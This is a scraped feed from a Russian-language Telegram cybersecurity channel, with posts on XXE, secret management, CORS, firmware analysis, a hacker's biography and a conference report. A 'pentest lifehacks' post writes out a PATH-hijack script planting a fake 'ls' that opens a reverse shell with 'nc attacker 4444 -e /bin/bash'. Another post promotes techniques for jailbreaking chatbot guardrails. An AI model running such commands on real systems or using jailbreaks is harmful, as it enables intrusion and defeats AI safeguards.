ZeroDay | Кибербезопасность
45K subscribers
555 photos
5 videos
8 files
729 links
Ваш учебник по кибербезопасности

Реклама - @bashmak_media

https://telega.in/c/cybersec_academy

РКН: https://vk.cc/cHYqeq
Download Telegram
Уязвимости XXE в разрезе Java

XML-файлы везде: в настройках, данных, обмене информацией. Но если парсер не настроен должным образом, хакер может взять и воспользоваться механизмом внешних сущностей (XXE), чтобы вытянуть из сервера файлы, к которым не должен иметь доступа - начиная от конфигов и заканчивая паролями.

В статье показывают, как на примере Java-кода происходит эта атака, почему она так опасна, и что нужно делать, чтобы точно закрыть эту дверь - отключить внешние сущности, запретить DTD и правильно настроить парсер.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
💘942👍1
🎁 Большой розыгрыш от Codeby X Zeroday

Мы подготовили для вас кучу полезных призов по кибербезопасности, чтобы апнуть свои навыки!

Что можно выиграть:

1) 15 месячных подписок на платформу hackerlab.pro
2) 5 книг «Искусственный интеллект глазами хакера»
3) 5 промокодов на курсы Codeby

Целых 25 призовых мест!

🗓 Итоги — 21 августа в 19:00 (МСК).

Как участвовать:

1) Подписаться на канал @codeby_sec
2) Подписаться на канал @cybersec_academy
3) Нажать кнопку «Участвовать» под этим постом

Ждать результатов розыгрыша

Бот может немного подвиснуть — не паникуйте, просто нажмите кнопку ещё раз.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1613🔥8👎1
Infisical: настраиваем хранение секретов

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

Infisical - это классная open-source платформа, которая собирает все ваши пароли, ключи, сертификаты и конфиги в одном месте.

Зачем она нужна: когда секреты разбросаны по разным сервисам, средам и локальным машинам - это постоянный риск и нервы. Этот инструмент упрощает жизнь контролирует доступ, ведёт историю изменений, автоматически обновляет ключи и даже генерит временные секреты, которые сами «умирают», чтобы лишний раз не переживать.

Как начать:

1️⃣Запускаете локально через Docker, пару команд в терминале — и вуаля, ваша платформа готова:

git clone https://github.com/Infisical/infisical  
cd infisical
cp .env.example .env
docker compose -f docker-compose.prod.yml up


Потом заходите на https://localhost:80, создаёте аккаунт и вперед — порядок в секретах.

2️⃣Интегрируете в CI/CD, чтобы секреты подтягивались прямо в ваши пайплайны — никаких секретов в коде:

infisical run -- <ваша команда>


3️⃣Чтобы не сливать пароли в репозиторий, ставите проверку на каждый коммит:

infisical scan install --pre-commit-hook  
infisical scan --verbose


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
😐187👍3🔥3🤣2
P2P-мессенджер, работающий без интернета

👋 Приветствую в мире цифровой безопасности!

Сегодня расскажу про мессенджер BitChat, который работает без интернета вообще.


BitChat создал Джек Дорси - тот самый парень, который стоял у истоков Twitter. Его команда решила сделать инструмент, который поможет оставаться на связи даже в самых жестких условиях - после аварий, отключений или вдалеке от всего.

Главная фишка BitChat - децентрализованная mesh-сеть на Bluetooth Low Energy. Другими словами: каждый телефон тут - и отправитель, и ретранслятор сообщений. Так сообщения перепрыгивают с одного устройства на другое, пока не доберутся до получателя.

И никаких привычных аккаунтов или номеров. Вместо этого эфемерные ID, которые постоянно меняются. Это значит, что вас почти невозможно отследить.

Что по безопасности: сообщения шифруются по протоколу Noise, а для маскировки трафика добавляются случайные задержки и фейковые сообщения. Даже если связь пропала, сообщения сохраняются и уходят, когда устройство снова окажется в сети. А функция «тройное касание» позволит моментально стереть все данные, если вдруг нужно срочно очистить следы.

Еще одна фишка: в BitChat есть IRC-подобные команды, чтобы создавать каналы, отправлять личные сообщения или блокировать пользователей. Трафик сжимается, батарея экономится, а разработчики обещают добавить поддержку LoRa (для сверхдальней связи), Wi-Fi Direct и даже ультразвук!

ZeroDay | #разное
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥59👎1610👍6❤‍🔥1🤔1💘1
This media is not supported in your browser
VIEW IN TELEGRAM
API-токены: как один ключ может открыть вообще всё

👋 Приветствую в мире цифровой безопасности!

Сегодня кратко о том, как один забытый ключ может превратить сервис в открытый буфер для хакеров.

К сути: часто разрабы оставляют API-токены прямо в коде или .env-файлах. Казалось бы, мелочь, но сканеры вроде truffleHog и Gitleaks ищут их на GitHub и других репозиториях. Один успешный поиск, и кто-то уже в вашем облаке, с доступом к базам и сервисам.

Ищем токены первыми:

git log -p | grep -i "api_key"


или с помощью

truffleHog --repo https://github.com/your/repo


Ротация ключей: меняем токены регулярно, чтобы даже найденный ключ быстро терял ценность.

Минимальные права: токен получает только те возможности, которые реально нужны.

aws iam create-policy --policy-name ReadOnlyPolicy ...


Хранилища секретов: Vault, Infisical, Secrets Manager - чтобы токены не болтались в коде. И не забываем про Pre-commit hooks. Смотрим каждый коммит локально, прежде чем пушить в репозиторий.

gitleaks detect --source . --branch=main


ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
👍226
This media is not supported in your browser
VIEW IN TELEGRAM
CORS: блокировка кросс-домена

👋 Приветствую в мире цифровой безопасности!

Поговорим про CORS. Такой механизм, который браузеры используют, чтобы защищать пользователя от «чужого кода».

CORS (Cross-Origin Resource Sharing) нужен, чтобы сайты не могли тайно читать данные с других доменов. Например, вы зашли на bank.com, а потом открыли evil.com — без CORS JavaScript на evil.com мог бы запросить /api/account и прочитать ваши куки. Плохая идея, верно?

Как на деле: простые GET/POST запросы браузер пропускает, но читать ответ не даст без заголовков Access-Control-Allow-Origin. Сложные запросы (PUT, DELETE, кастомные заголовки) сначала проходят preflight-запрос OPTIONS. Сервер должен подтвердить, типо: «Да, фронтенд с этого домена может использовать эти методы и заголовки».

Access-Control-Allow-Origin: https://frontend.com
Access-Control-Allow-Methods: POST, DELETE
Access-Control-Allow-Headers: Content-Type, Authorization


Пример для Express.js:

app.use((req, res, next) => {
res.setHeader('Access-Control-Allow-Origin', 'https://frontend.com');
res.setHeader('Access-Control-Allow-Methods', 'GET, POST, PUT, DELETE');
res.setHeader('Access-Control-Allow-Headers', 'Content-Type, Authorization');
res.setHeader('Access-Control-Allow-Credentials', 'true');
next();
});


Советы на практике: никогда не давайте * для защищённых данных, проверяйте preflight OPTIONS для сложных запросов, ограничивайте куки и токены доверенными доменами, а кэширование preflight-запросов через Access-Control-Max-Age снизит нагрузку.

Типичные косяки: забыли заголовки - ответ блокируется; использовали * с куки - это тоже ошибка. Не настроили OPTIONS? Ну тогда сложный запрос не проходит.

ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥6👍542👎1
📝 Вспомним протоколы безопасности

ZeroDay | #ИБ
Please open Telegram to view this post
VIEW IN TELEGRAM
25👍9🤣2🫡2❤‍🔥1
Не судьба 🤷‍♂️

ZeroDay | #мем
❤‍🔥50🤣34😁422
Джейлбрейкаем чатботы: ChatGPT без фильтров

У чатботов есть встроенные «поручни безопасности» - guardrails, которые не дают им выходить за рамки дозволенного. Но что если эти ограничения мешают работе? Тут поможет джейлбрейк: от ролевых сценариев до визуальных инъекций, позволяющих обойти ограничения и заставить ИИ отвечать, как нужно вам.

В статье разбирают, как работают джейлбрейки, какие техники до сих пор живы (спойлер: не всё закрыто), и почему умение ломать guardrails не только про «серые зоны», но и про аудит безопасности, а также честный доступ к инфе.

ZeroDay | #Статья
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12🔥2
Какая угроза характерна ИМЕННО для облачных сервисов, где ресурсы разделяют несколько пользователей?
Anonymous Quiz
10%
Фишинг
71%
Неправильная изоляция между клиентами
5%
Слабый пароль
14%
SQL-инъекции
👍1
EMBA: инструмент для анализа прошивок

👋 Приветствую в мире цифровой безопасности!

Поговорим о еще одном инструменте безопасности.

EMBA - это open-source утилита, которая берёт firmware и вытаскивает из неё всё подозрительное: от hardcoded-паролей и дырявых бинарников до древних библиотек и кривых скриптов.

Зачем: прошивки - на деле, один из любимых векторов атак. Роутеры, камеры, умные колонки - всё это часто забывают обновлять. А значит, без инструментов вроде EMBA вы рискуете проглядеть дыру, через которую к вам залезут хакеры.

Что умеет: да кучу всего. Делает статический и динамический анализ (с эмуляцией), генерацию SBOM (списка компонентов), проверку конфигов и библиотек, плюс хороший веб-отчёт, который можно сразу показывать разрабам или прикладывать к пентесту.

Быстро стартуем (Linux, нужен Docker):

git clone https://github.com/e-m-b-a/emba.git
cd emba
sudo ./installer.sh -d


Прогон прошивки через дефолтный профиль:

sudo ./emba -l ~/log -f ~/firmware -p ./scan-profiles/default-scan.emba


Нужен SBOM?

sudo ./emba -l ~/log -f ~/firmware -p ./scan-profiles/default-sbom.emba


ZeroDay | #Инструмент
Please open Telegram to view this post
VIEW IN TELEGRAM
👍136🔥3
Вебинар для всех, кто работает с персональными данными

🗓3 сентября, 12:00
📍Онлайн

Selectel проведет вебинар, где разберут:
- как компаниям определить уровень защищенности персональных данных,
- как реализовать и подтвердить меры защиты.

Мероприятие бесплатное. Посмотреть программу и зарегистрироваться можно по ссылке: https://slc.tl/whxl1

Чтобы не пропустить вебинар и узнавать о митапах, воркшопах и бесплатных курсах Selectel, подписывайтесь на @selectel_events

Реклама. АО «Селектел», ИНН 7810962785, ERID: 2VtzqwahbzJ
6👎1
ZeroDay | Кибербезопасность
🎁 Большой розыгрыш от Codeby X Zeroday Мы подготовили для вас кучу полезных призов по кибербезопасности, чтобы апнуть свои навыки! Что можно выиграть: 1) 15 месячных подписок на платформу hackerlab.pro 2) 5 книг «Искусственный интеллект глазами хакера»…
🎉 Результаты розыгрыша:

🏆 Победители:
1. Eugene (@jenigen)
2. $.7&& (@k0st0vk7)
3. Banana (@solncelunaoblako)
4. ㅤ
5. Dmitry (@Enk0d)
6. Sergey (@Ref1leqq)
7. Nodar (@x0ff_deus)
8. mikhail (@ownnickname)
9. -A (@id9912345)
10. ki.real (@iamTRC20)
11. Екатерина (@catkozh)
12. Zefir (@ivansamsia)
13. ΝᎬϴᎷᎪᏀᎬ (@neo_mage)
14. Мухит
15. Vladislav (@darkh4mster)
16. 朴贊郁 (@flokiauther)
17. mad_peleng (@mad_peleng)
18. ᅠ
19. Владислав (@Watatamin)
20. 🍃 (@haltdiekIappe)
21. Сергей (@lanikhinSergei)
22. Andrei (@a_vasiukou)
23. Nikita (@heliotropelovethesun)
24. kimawashi (@romant1ca_com)
25. S (@SNSN_2023)

✔️Проверить результаты
Please open Telegram to view this post
VIEW IN TELEGRAM
1😢18🎉10🔥42👎1
Тот, кто знал слишком много: история Хьё Минь Нго

👋 Приветствую в мире цифровой безопасности!

Расскажу об обычном парне из Вьетнама, который стал случайно владеть базой данных в 200 млн.

Первые шаги: подросток из маленького вьетнамского городка просто хотел обойти лимиты dial-up и сидеть в инете бесплатно. Кончилось всё, как обычно, долгом для семьи и ссылкой к дяде «на перевоспитание». Там он наткнулся на хакерский форум и понял, что впереди много всего интересного.

От баловства к деньгам: сначала были надписи «Pwned by Hieu.pc» на сайтах. Потом - кредитки и обналичка через онлайн-покер. Доходы теперь шли в тысячи долларов в день. Чтобы ускорить поток, он написал свой сканер SQL-инъекций и штамповал данные пачками.

Большая игра: однажды ему подсказали - кредитки слишком заметны, а персональные данные стоят куда дороже. Он смог получить доступ к базе из 200 млн записей через контракт с Court Ventures. На своём сайте продавал поиск всего за $1, при себестоимости $0,14. В лучшие месяцы доходил до $120 000.

Падение: в 2012 Court Ventures купила Experian, и слишком активный «частный детектив из Сингапура» привлёк внимание агентов. Его заманили в Гуам и арестовали. Обвинения тянули на 45 лет, но сделка с правосудием сократила срок до 13, из которых он отсидел 7.

Новая глава: после освобождения в 2020 он вернулся во Вьетнам уже другим человеком. Теперь помогает ловить киберпреступников, консультирует жертв мошенников и читает лекции.

ZeroDay | #безопасность
Please open Telegram to view this post
VIEW IN TELEGRAM
195🤔2🤣2
This media is not supported in your browser
VIEW IN TELEGRAM
3 лайфхака для пентестинга

👋 Приветствую в мире цифровой безопасности!

Расскажу о трех полезных фишках при пентесте.


Быстрый поиск SUID и возможностей root: Не ограничивайтесьfind / -perm -4000. Используйте getcap -r / 2>/dev/null — это покажет бинарники с Linux capabilities. Например:

/usr/bin/python3 = cap_setuid+ep


Ну вот, у тебя по факту вышел шелл с root-привилегиями без эксплойтов.

Подмена скриптов через PATH: Если есть доступ к конфигам или cron, проверьте абсолютные пути команд. Можно подменить PATH и добавить свои скрипты:

echo "/tmp" > /etc/cron.d/fakelist
echo -e '#!/bin/bash\nnc attacker 4444 -e /bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH


SSH через прокси для MITM: Когда цель доступна по SSH, а нужен MITM, удобно юзать ProxyCommand:

Host target
ProxyCommand ncat --proxy attacker_ip:1080 --proxy-type socks5 %h %p


ZeroDay | #пентест
Please open Telegram to view this post
VIEW IN TELEGRAM
13❤‍🔥6👍3😁1💋1
39😁28🤣19👍2🤔2❤‍🔥1
OFFZONE 2025: ключевые инсайты о трансформации киберугроз

21–22 августа в Москве прошла шестая конференция по практической кибербезопасности OFFZONE 2025, собравшая более 2500 специалистов. В программе — 98 докладов и обсуждения ключевых вызовов для отрасли.

Среди тем:

— уязвимости в парсерах и пентест Wi-Fi;
— применение AI и ML в кибербезопасности;
— багбаунти, Web3, OSINT и построение защищённых цифровых экосистем.

Наибольшее внимание привлекло исследование "Threat Zone 2025: обратная сторона", результаты которого представила компания BI.ZONE. Эксперты проанализировали более 5000 сообщений с теневых форумов и каналов:

— 20% атакующих группировок используют коммерческое ВПО;
— стоимость корпоративных аккаунтов на черном рынке стартует от $10;
— стилеры остаются самым популярным видом коммерческого ВПО.

Конференцию открыл Евгений Касперский докладом о кибериммунитете для цифровой эры, а всего своими инсайтами поделились более 120 экспертов.

Атмосфера была не менее яркой: квесты, квизы в телеграм-боте, HACK in 15 min, Craft.Zone, кастомные бейджи и даже Tattoo.Zone, где 21 участник набил логотип OFFZONE и получил пожизненную проходку на все будущие конференции.

ZeroDay | #безопасность
13🔥10👍4👾2